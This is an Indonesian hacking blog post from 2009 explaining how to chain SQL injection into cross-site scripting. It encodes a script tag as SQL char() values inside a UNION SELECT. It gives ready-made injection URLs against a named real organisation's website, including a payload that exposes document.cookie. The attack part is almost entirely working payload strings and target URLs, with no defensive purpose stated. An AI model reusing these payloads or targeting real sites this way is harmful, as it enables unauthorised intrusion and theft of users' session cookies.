06 August 2009

XSS dari SQL Injection

Nyoba XSS dari SQL injection!!!!
Cukup mudah tinggal rubah code javascript ke bentuk ASCII dan masukan ke dalam SQL injection.


Contoh:

String:
< script>alert('irvian')< /script> <--- tanpa spasi

ASCII:
char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,105,114,118,105,97,110,39,41,60,47,115,99,114,105,112,116,62)

Untuk mempermudah gunakan tool di perl di http://h1.ripway.com/irvian/ascii.txt

Penerapan pada target

Target:
http://www.cpme.be

Vuln SQL:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,1,2,3/*

Injection XSS:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,null,char%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,39,105,114,118,105,97,110,39,41,60,47,115,99,114,105,112,116,62%29,3'

Jika muncul textbox irvian berarti javascript berhasil di load.

String:
< script>alert(document.cookie)< /script> <--- tanpa spasi

ASCII:
char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)

Injection XSS:
http://www.cpme.be/content.php?c=-patient_safety%27+union+select+0,null,char%2860,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62%29,3'

terlihat textbox mengeluarkan isicookies.


sumber:
http://milw0rm.com/papers/363

di 10:20 PM

Share |

Label:

0 komentar:

Post a Comment

Subscribe to: Post Comments (Atom)
powered by irvian